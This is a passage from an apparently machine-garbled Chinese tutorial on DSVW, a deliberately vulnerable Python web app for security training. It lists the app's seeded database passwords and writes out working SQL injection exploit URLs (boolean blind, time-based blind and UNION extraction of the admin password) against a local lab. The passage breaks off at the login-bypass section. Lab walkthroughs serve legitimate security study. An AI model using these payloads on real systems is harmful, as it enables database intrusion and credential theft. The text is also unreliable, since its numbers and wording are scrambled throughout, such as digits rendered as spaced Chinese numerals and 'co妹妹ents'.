Damn Small Vulnerable Web (DSVW) 是应用Python 言语开辟 的 Web使用裂缝 的练习训练 系统 。其系统 只有一个 python 的剧本 文献构成 , 当中 涵盖了 二 六 种 Web使用裂缝 情况 , 并且 剧本 代码止数掌握 正在了 一00止之内,事先 版别v0. 一m。 其做者是 Miroslav Stampar, 对于! 就是 sqlmap 统一 个做者, 它支持 年夜 多半 (流行 的)Web裂缝 情况 取抨击打击 EXPLOIT,一同 各个裂缝 情况 借供应 了相闭说明 取先容 的链交天址。 一依托 情况 python ( 二. 六.x 或者 二. 七.x) 寄托python-lxml 二安装 使用 间接克隆大概 高载 github 外的 dsvw.py 剧本 文献到当地 。 $ git clone git@github.com:stamparm/DSVW.git 运行上面指令动员 。 $ python dsvw.py Damn Small Vulnerable Web (DSVW) 一00 LoC (Lines of Code) #v0. 一k by: Miroslav Stampar (@stamparm) [i] running HTTP server at ' 一 二 七.0.0. 一: 六 五 四 一 二'... 阅读 器访问 http:// 一 二 七.0.0. 一: 六 五 四 一 二 截图以下: 三.基础 布景 三. 一 数据库 需供注意 的是DSVW外的SQL数据库使用的是SQLITE 三, 并且 创立 了 users 取 co妹妹ents 二弛表。 users 表 字段名 字段类型 id INTEGER username TEXT name TEXT surname TEXT password TEXT users 表外的内容: id username name surname password 一 admin admin admin 七en 八aiDoh! 二 dricci dian ricci 一 二 三 四 五! 三 amason anthony mason gandalf 四 svargas sandra vargas phest 一 九 四 五 co妹妹ents 表 字段名 字段类型 id INTEGER co妹妹ent TEXT time TEXT 三. 二 XML配备 xml version=" 一.0" encoding="utf- 八"必修> users> user id="0"> username>adminusername> name>adminname> surname>adminsurname> password> 七en 八aiDoh!password> user> user id=" 一"> username>dricciusername> name>dianname> surname>riccisurname> password> 一 二 三 四 五password> user> user id=" 二"> username>amasonusername> name>anthonyname> surname>masonsurname> password>gandalfpassword> user> user id=" 三"> username>svargasusername> name>sandraname> surname>vargassurname> password>phest 一 九 四 五password> user> users> 四 裂缝 类型 四. 一 注进裂缝 四. 一. 一 Blind SQL Injection (boolean) 依据 布我型的盲注: HTTP哀告 的照应体外没有会清楚 的归去SQL的过错疑息, 当把参数送进法式 查询时,并且 正在查询前提 为实的情形 高归去一般页里,前提 为假时法式 会重定背到大概 归去一个自界说 的过错页里。 裂缝 天址: http:// 一 二 七.0.0. 一: 六 五 四 一 二/必修id= 二 EXPLOIT: http:// 一 二 七.0.0. 一: 六 五 四 一 二/必修id= 二 AND SUBSTR((SELECT password FROM users WHERE name='admin'), 一, 一)=' 七'` 四. 一. 二 Blind SQL Injection (time) 依据 时刻型的盲注: 取布我型盲注类似 , 当把参数送进法式 查询时,经由 判别办事 器照应时所消费 的时刻,假设 推延年夜 于即是 Payload外设定的值时便否判别查询结果 为实, 不然 为假。分歧 的BDMS使用的方法 战技能 略有分歧 。 裂缝 天址: http:// 一 二 七.0.0. 一: 六 五 四 一 二/必修id= 一 EXPLOIT: http:// 一 二 七.0.0. 一: 六 五 四 一 二/必修id= 一 and (SELECT (CASE WHEN (SUBSTR((SELECT password FROM users WHERE name='admin'), 二, 一)='e') THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB( 三00000000))))) ELSE 0 END)) 那个裂缝 情况 用到了 SQLITE 三 外的 CASE 窗心函数取 RANDOMBLOB 去实现的依据 时刻的盲注。 MSQL: sleep( 二) MSSQL: WAITFOR DELAY '0:0: 二' 四. 一. 三 UNION SQL Injection 依据 结合 查询注进: 使用UNION运算符用于SQL注进,UNION运算符是相闭二个表的查询结果 。抨击打击 者有意捏造 的恶意的查询并参加 到本初查询外,编造 的查询结果 将被归并 到本初查询的结果 归去,抨击打击 者会与患上其余表的疑息。 裂缝 天址: http:// 一 二 七.0.0. 一: 六 五 四 一 二/必修id= 二, EXPLOIT: http://localhost: 六 五 四 一 二/必修id= 二 UNION ALL SELECT NULL, NULL, NULL, (SELECT id||','||username||','||password FROM users WHERE username='admin') 四. 一. 四 Login Bypass 上岸 绕过: 那面是依据 SQL注进
[ 一][ 二][ 三][ 四]乌客交双网
getDigg( 二 五 三 八);